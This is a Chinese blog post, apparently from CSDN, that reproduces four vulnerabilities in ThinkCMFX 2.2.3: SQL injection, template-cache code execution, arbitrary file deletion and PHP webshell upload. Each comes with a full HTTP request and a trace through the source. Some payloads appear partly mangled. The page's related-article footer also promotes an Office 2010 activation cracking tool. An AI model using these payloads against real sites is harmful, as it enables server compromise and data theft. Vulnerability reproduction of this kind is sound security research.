thinkcmfx漏洞太大_ThinkCMFX2.2.3漏洞复现

最新推荐文章于 2023-09-22 16:43:22 发布
最新推荐文章于 2023-09-22 16:43:22 发布
阅读量760 收藏
点赞数
文章标签: thinkcmfx漏洞太大
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39646405/article/details/111814555
版权

对ThinkCMFX最终版本2.2.3存在的四个漏洞进行复现

ThinkCMFX 是基于 ThinkPHP3 开发的 ,ThinkCMFX2.2.3 下载地址:https://pan.baidu.com/s/1bRXwdg

前台SQL注入

随意注册一个 普通用户 登陆后,发送如下数据包可触发 SQL注入

1

2

3

4

5

6

7

8POST /index.php?g=portal&m=article&a=edit_post HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=2894fb4dbf964f58ccf3d2e4e372b316

Host: 127.0.0.1:8000

Content-Length: 78

Connection: close

post[id][0]=bind&post[id][1]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)#

漏洞文件位于 application/Portal/Controller/ArticleController.class.php

漏洞产生的本质是未对用户输入进行过滤,用户可控变量$article来源于POST传递的参数名为post的数组,再将$article的id字段 未经过滤 就直接拼接到where条件语句中查询,导致 sql注入漏洞 。下面开始跟进漏洞。

跟进到save方法后,$data参数传入update方法开始执行数据库 UPDATE 操作

然后将$options['where']传入parseWhere函数进行where条件语句的拼接,最后跟进到parseWhereItem函数

程序处理过程中使得$exp == 'bind',最后拼接成的where语句为:1WHERE `id` = :0 and updatexml(1, concat(0x7e,user(),0x7e),1)

前台代码执行

发送如下数据包后可触发 代码执行 漏洞,但该漏洞只适用于 Windows 系统

1/index.php?g=comment&m=widget&a=fetch&templateFile=/../public/index&content=');%3f>&prefix=

这个漏洞的成因主要是因为对用户输入的 模板文件名 和 模板文件内容 未进行过滤。导致用户可以将webshell写入 缓存文件 ,而框架会自动包含 缓存文件 ,这样就能成功执行webshell

漏洞文件位于 application/Comment/Controller/WidgetController.class.php

首先我们传入的参数$templateFile会经过sp_add_template_file_suffix添加html后缀,后半部分 变成/../public/index.html, 前半部分 还要拼接上 THEME_PATHComemt ,也就是变成了THEME_PATHComemt/../public/index.html。

然后进入到了 file_exists_case 方法,该方法通过is_file函数来判断$templateFile代表的文件名是否存在

而 THEME_PATHComemt/ *这个目录是肯定 *不存在 的,例如linux环境下。而如果是 Windows 环境下,是允许 不存在目录/../public/index.html 进行路径穿越的,测试如下:

继续跟进,在 simplewind/Core/Library/Think/Template.class.php 中执行put方法

simplewind/Core/Library/Think/Storage/Driver/File.class.php 在put方法中将 模板文件内容 参数$contents写入到缓存文件中

之后再执行load方法 包含 这个缓存文件

从而在网站根目录写入 webshell

任意文件删除

前台普通用户登陆后,保存头像处存在 任意文件删除 漏洞,发送如下数据包即可删除网站根目录下的 somnus.txt 文件(仅适用在 Windows 环境下)

1

2

3

4

5

6

7

8POST /index.php?g=user&m=profile&a=do_avatar HTTP/1.1

Cookie: PHPSESSID=2894fb4dbf964f58ccf3d2e4e372b316

Host: 127.0.0.1:8000

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 26

imgurl=......somnus.txt

该漏洞成因主要是:对用户输入的 头像文件 参数过滤不全,只过滤了/,而未过滤。而在 Windows 环境下支持通过 进行 路径穿越 ,从而导致了 任意文件删除 漏洞的产生。

下面跟进代码分析:application/Asset/Controller/UeditorController.class.php

用户可以通过post传入参数 imgurl ,然后将/替换为空后,执行sp_delete_avatar函数

此时$file参数路径为:data/upload/avatar/......somnus.txt 。然后进入has函数判断文件是否存在,如果存在,则执行unlink函数进行 文件删除 操作

任意文件上传

前台普通用户登录后,发送如下数据包后可以上传任意文件:

1

2

3

4

5

6

7

8

9

10

11

12

13POST /index.php?g=Asset&m=Ueditor&a=upload&action=uploadfile HTTP/1.1

Content-Type: multipart/form-data; boundary=--------------------------486405972975663160224525

Cookie: PHPSESSID=2894fb4dbf964f58ccf3d2e4e372b316

Host: 127.0.0.1:8000

Content-Length: 239

Connection: close

----------------------------486405972975663160224525

Content-Disposition: form-data; name="file"; filename="shell.php"

Content-Type: application/x-httpd-php

phpinfo(); ?>

----------------------------486405972975663160224525--

上传成功后,服务器也会返回给我们文件的 绝对路径 ,直接访问即可触发webshell

下面跟进漏洞文件:application/Asset/Controller/UeditorController.class.php

在调用UeditorController类的upload方法前,在__construct构建方法首先调用了_initialize方法,跟进该方法,会发现进行了是否登陆的判断,如果未登陆会返回 非法操作!

然后进入upload方法,根据用户输入的$_GET['action']进入对应的上传功能,这里漏洞原因函数在于 _ueditor_upload ,我们选取一个uploadfile为例

刚进入该函数调试,就能发现问题所在:

程序中设置允许上传的文件后缀名参数$allow_exts是通过代码:explode(',', $upload_setting[$filetype]),而通过调试我们可以很清楚的发现,允许的后缀名应该在$upload_setting[$filetype]['extensions']。所以,这样的写法使得了$allow_exts为空,导致了如下图所示的,传入ThinkUpload上传类的配置参数$config['exts']为空

之后进入上传类文件:simplewind/Core/Library/Think/Upload.class.php 的upload方法开始上传文件

在upload方法中通过check方法对上传的文件进行逐个检查操作,跟进check方法,锁定关键的检查文件后缀操作部分代码:

可以看到,由于之前传入该类的参数$config['exts']部分为空,所以检查函数 checkExt ,本应当进行 白名单过滤 却因为$config['ext'] == null而直接返回了 true ,从而导致上传的shell文件通过了check方法的文件检测

通过文件检测后,又进入了 simplewind/Core/Library/Think/Upload.class.php 的saveName方法开始上传文件

该方法通过uniqid函数生成 随机数 作为 文件名 ,然后在设置文件后缀名部分的判断,这里由于$config['saveExt']前面程序并未设置,所以为null,导致了文件 后缀名 取自 $file[‘ext’] ,该参数在前面取自:$file['ext'] = pathinfo($file['name'], PATHINFO_EXTENSION);,所以为 php ,最后拼成了文件名: 随机数.php

检查文件 和 生成文件名 等操作完成后,就调用了 simplewind/Core/Library/Think/Upload.class.php 的save方法,进行 上传文件 操作

至此,文件 ./data/upload/ueditor/20191218/5dfa2096b20ef.php 成功上传

最后,回到一开始的 _ueditor_upload 方法,上传文件成功后,又将 文件名 以 json 数据的 url 部分返回给我们

综上分析,该漏洞的成因主要是程序员的疏忽未正确设置 允许的后缀名 和 保存的后缀名 ,导致用户可以随意上传 php 后缀文件。并且,上传成功后也直接将文件的 绝对路径 返回给我们,即使文件名是通过 随机数 函数生成的,用户也可以直接通过返回信息得到上传的绝对路径。

参考

weixin_39646405
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkCMF X 2.2.3 SQL注入漏洞
Shen__Kong的博客
11-07 1052
漏洞2.3版本又以下,漏洞点与ArticleController.class.php edit_post方法SQL注入(CVE-2018-19898) 。 ThinkCMF X2.2.2是基于ThinkPHP 3.2.3开发的,ThinkPHP 3.x版本之前被爆出存在bind注入,这个漏洞就是ThinkPHP3.x注入的典型案例。漏洞位于前台文章编辑处,不过要复现这个漏洞点首先是要注册一个普...
ThinkCMF框架任意内容包含漏洞分析复现
m0_48520508的博客
07-29 576
0x01简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 0x02漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特
thinkcmf最新版
05-23
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架(CMF),我们一直秉承ThinkPHP大道至简的理念,坚持做最简约的ThinkPHP开源软件,多应用化开发方式,让您更快地...
ThinkCMFX2.2.3_20161213.zip
01-23
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展,每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 ThinkCMFX 2.2.3 更新日志:2016-12-13 * 修复后台部分浏览器无法上传问题; * 优化chrome 上传文件时,打开文件选择框慢; * 修复后台文件添加编辑相册图片移除浏览器不兼容问题; * 修复文件上传在遨游下不能上传文件问题; * 修复后台登录错误时提示无样式。
jmeter_ServerAgent-2.2.3.zip
06-04
jmeter服务端监控工具 参考地址:https://blog.csdn.net/weixin_43165686/article/details/82559933 (1)在linux任意目录下创建一个文件夹,使用rz命令把ServerAgent-2.2.1.zip上传上去, (2)解压 命令 unzip ServerAgent-2.2.1.zip (3)解压完成后,使用./startAgent.sh 启动
GD32F10x_Firmware_Library_V2.2.3
08-18
GD32F10X固件库文件,例程
LPC_ARM_ISP_V2.2.3.zip_微处理器开发_C/C++_
08-12
LPC24XX UART0 AD 等例子程序。
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 642
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 823
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2805
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
thinkcmf-ThinkCMFX-master
12-11
基于bootstrap开发的网站模板,可用于二次开发,内含丰富控件,界面完美大气。
thinkcmf-ThinkCMFX-X2.1.0
11-01
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本
STRS-2.2.3.rar_ STRS-2.2.3_.strs_STRS-2.2.3_item.strs_strs
09-21
this is file to edit your strs hp
thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞(学习)
weixin_39967120的博客
12-22 293
前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法我们可以跟进父类的fetch的方法中查看发现还调用了父类的...
springboot整合ueditor,图片上传及视频上传(后端)
weixin_43921060的博客
05-30 1161
简介 UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。官网提供了jsp、php、asp、asp.net4种配置方式,但没有java的。根据jsp需要返回的数据格式,假装自己是jsp给他返回。以下只提供后端的代码,前端的直接按照官网的配置就行。 工具 以下为工具来源,实际已结合到代码中了。 1.百度vue-ueditor-wrap,下载jsp、utf8的文档,解压 2.进入jsp文件夹,打开config.json,用nodepad++打开或者把后
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 270
?>’)/shell.php?>’)
26. 基于视觉的道路识别技术的智能小车导航源代码.zip
06-02
1.智能循迹寻光小车(原埋图+PCB+程序).zip 2.智能循迹小车程序.zip 3.智能寻迹小车c程序和驱动.zip 4. 智能小车寻迹(含霍尔测連)c程序,zip 5.智能小车完整控制程序,zip 6.智能小车黑线循迹、避障、遥控实验综合程序,zip 7.智能小车测速+12864显示 C程序,zip 8. 智能小车(循迹、避障、遥控、测距、电压检测)原理图及源代码,zip 9.智能灭火小车,zip 10,智能搬运机器人程序.zip 11.智能arduino小车源程序,z1p 12.-种基于STM32的语音蓝牙智能小车,zip 13.循迹小车决赛程序,zip 14.循迹小车51程序(超声波 颜色识别 舵机 步进电机 1602).zip 15.寻光小车,zip 16.小车测速程序,zip 17.五路循迹智能小车c源码.zip 18.无线小车原理图和程序,zip 19.四驱智能小车资料包(源程序+原理图+芯片手册+各模块产品手册).zip 20.4WD小车安装教程及程序,z1p 21.四路红外循迹小车决赛程序,zip 22,适合初学者借鉴的arduino智能小车代码集合,zip 23.脑电波控制小车,zip 24.蓝牙智能避障小车,zip 25.基于树莓派监控小车源码.zip 26.基于视觉的道路识别技术的智能小车导航源代码,zip 27.基于STM32F407的超声波智能跟随小车,zip 28.基于arduino的蓝牙智能小车,zip.zip 29.基于51的蓝牙智能小车,zip 30.基于51单片机的红外遥控控制小车程序,zip
295_驾校预约管理系统的设计与实现-源码.zip
06-02
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
price2016.csv
最新发布
06-02
price2016.csv
office_2010_toolkit_2.2.3
06-20
### 回答1: office_2010_toolkit_2.2.3是一款用于安装、激活或卸载微软Office 2010的工具包。它可以帮助用户在可接受的时间和成本范围内完成Office 2010的安装和激活,使用户能够畅享Office 2010的完整功能。此外,它还具有深度定制Office 2010的功能,集成了可重载背景、自定义背景和Office 2010安装工具等功能,让用户可以根据自己的需求进行选择,提高了用户的自定义能力。通过使用office_2010_toolkit_2.2.3,用户可以在电脑上畅享Office 2010的各种功能和优势,让工作变得更加高效和组织,提高生产力和竞争力。为了更好地使用本软件,建议用户仔细阅读软件的相关说明和使用教程,以充分利用本软件的功能和优势,并确保使用过程中的安全和稳定性。 ### 回答2: Office 2010 Toolkit 2.2.3是一个用于激活Microsoft Office 2010的工具软件。该软件可以激活Office 2010的各个组件,包括Word、Excel、PowerPoint等等。此外,该工具还带有一些其他的功能,如在Windows上安装Office 2010、在Office 2010中安装组件等等。 使用Office 2010 Toolkit 2.2.3进行激活非常简单。用户只需要运行该软件,并选择要激活的Office组件,然后点击“Activate”按钮即可。该工具会自动激活所选组件,并在完成后显示成功的提示信息。 需要注意的是,为了使用Office 2010 Toolkit 2.2.3进行激活,用户必须拥有有效的Office 2010许可证。此外,使用该工具进行激活可能会被认为是非法行为,因此用户应该自行承担使用该工具的风险。 总之,Office 2010 Toolkit 2.2.3是一个方便易用的Office 2010激活工具,它可以帮助用户快速、简单地激活Office 2010,提高用户的工作效率和使用体验。 ### 回答3: office_2010_toolkit_2.2.3是一款能够激活Microsoft Office 2010软件的工具集合程序。这个工具集合程序中包含了多个小工具,能够对Microsoft Office 2010软件进行全面的激活,包括Word、Excel、PowerPoint以及其他常用软件。使用office_2010_toolkit_2.2.3激活软件可以让我们获得完整的软件功能,而不再受到功能限制。 与其他激活工具相比,office_2010_toolkit_2.2.3具有更为简单易用的特点。我们只需要下载并运行这个工具集合程序,然后根据提示选择需要激活的Office 2010软件版本,即可完成激活。 需要注意的是,虽然office_2010_toolkit_2.2.3是一款非常方便实用的工具集合程序,但它并非官方软件,是第三方开发者制作的软件。因此,在使用激活工具时一定要注意选择正规可靠的来源,以免给自己的计算机系统带来不必要的麻烦。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值